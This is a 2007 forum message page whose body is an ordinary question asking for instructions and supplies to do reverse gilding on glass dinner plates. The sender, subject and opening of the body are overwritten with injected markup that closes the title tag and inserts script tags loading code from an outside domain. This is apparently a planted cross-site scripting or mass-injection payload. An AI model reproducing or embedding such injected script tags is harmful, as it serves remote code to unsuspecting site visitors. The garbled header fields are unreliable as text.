Post Home

< Previous | Next > | Msg List |
From: "> </title><script src="http://global.menotepoer.c
Date: 3/3/2007 2:32:24 PM
Subject: "> </title><script src=""></script><!--"></title><script src=
"> </title><script src=""></script><!--"></title><script src=""></script><!--I'm trying to find instructions and supplies needed to do reverse gilding on glass dinner plates. I have some plates like this that I purchased and I would like to try it myself. It looks like gold paint or gilding was applied to the back of the plate and it looks marbled or crackled. A coat of very dark, almost black paint seems to have been applied over this to fill in the cracks and seal the back. I hope you can help. Thank You ! Barbara